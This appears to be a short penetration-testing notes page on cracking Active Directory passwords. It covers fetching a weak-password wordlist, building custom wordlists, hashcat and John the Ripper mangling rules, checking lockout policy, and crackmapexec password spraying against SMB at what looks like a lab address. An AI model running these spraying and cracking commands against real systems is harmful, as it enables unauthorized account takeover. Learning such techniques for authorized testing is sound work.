Password Cracking

Infra password cracking - Build your own wordlist that fits

Take a wordlist

for example staticticaly meaningful

wget https://raw.githubusercontent.com/insidetrust/statistically-likely-
usernames/master/weak-corporate-passwords/english-basic.txt
cat users.txt >> english-basic.txt

or build your own based on user enumeration (SMB, RPC, WEB)

Building Yp Own Passowrd Wordlist

usernames including admins
seasons
password
<empty>

Rules Mangling with

Enrich your wordlist by rules, add a bit of that, reverse, mangle...

hashcat

rule_based_attack [hashcat wiki]

hashcat --force --stdout -r /usr/share/hashcat/rules/best64.rule password.list

John The Ripper

Comprehensive Guide to John the Ripper. Part 5: Rule-based attackEthical hacking and penetration testing

john hashes --wordlist=mywordlist --rules=MyRuleSet

where rule file /etc/john/john.conf

[List.Rules:MyRuleSet]
Az"[0-9][0-9][0-9][0-9]"

[List.Rules:Toggle]
T0
T1
T2
T0T1
T1T2
T0T2
T0T1T2
 
[List.Rules:Double]
d
p5
 
[List.Rules:Reflect]
f
 
[List.Rules:Reverse]
r

Now you have a wordlists that fits, be prepared for online password attack by checking...

Account Policy

Determine the account policy on your infra Active Directory before you start to lock out accounts

crackmapexec smb 10.129.228.111 --pass-pol

Start to crack with

Crackmapexec smb

# usernames only
crackmapexec smb 10.129.228.111 -u ./users.txt -p ./users.txt  --continue-on-success

# with custom pass list
crackmapexec smb 10.129.228.111 -u users.txt -p pass.lst

PreviousAzure Active Directory NextDomain Enumeration

Last updated 7 months ago